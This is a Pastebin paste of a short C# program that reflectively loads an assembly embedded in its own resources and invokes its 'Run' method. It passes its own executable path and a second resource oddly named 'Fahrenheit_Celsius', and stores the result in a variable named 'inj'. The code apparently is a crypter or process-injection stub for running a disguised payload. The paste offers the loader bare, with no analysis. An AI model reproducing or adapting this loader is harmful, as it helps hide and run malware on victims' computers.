Advertisement
Guest User

Exc

a guest
Jul 29th, 2016
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.54 KB | None | 0 0
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Threading.Tasks;
  5. using System.Windows.Forms;
  6. using System.Reflection;
  7.  
  8. namespace Run
  9. {
  10. static class Program
  11. {
  12. static void Main()
  13. {
  14. MethodInfo kokojumbo = Assembly.Load(Properties.Resources.lilRun).GetType("Resource.lilRun").GetMethod("Run");
  15. bool inj = (bool)kokojumbo.Invoke(null, new object[] { Assembly.GetExecutingAssembly().Location, "", Properties.Resources.Fahrenheit_Celsius, false });
  16. }
  17. }
  18. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement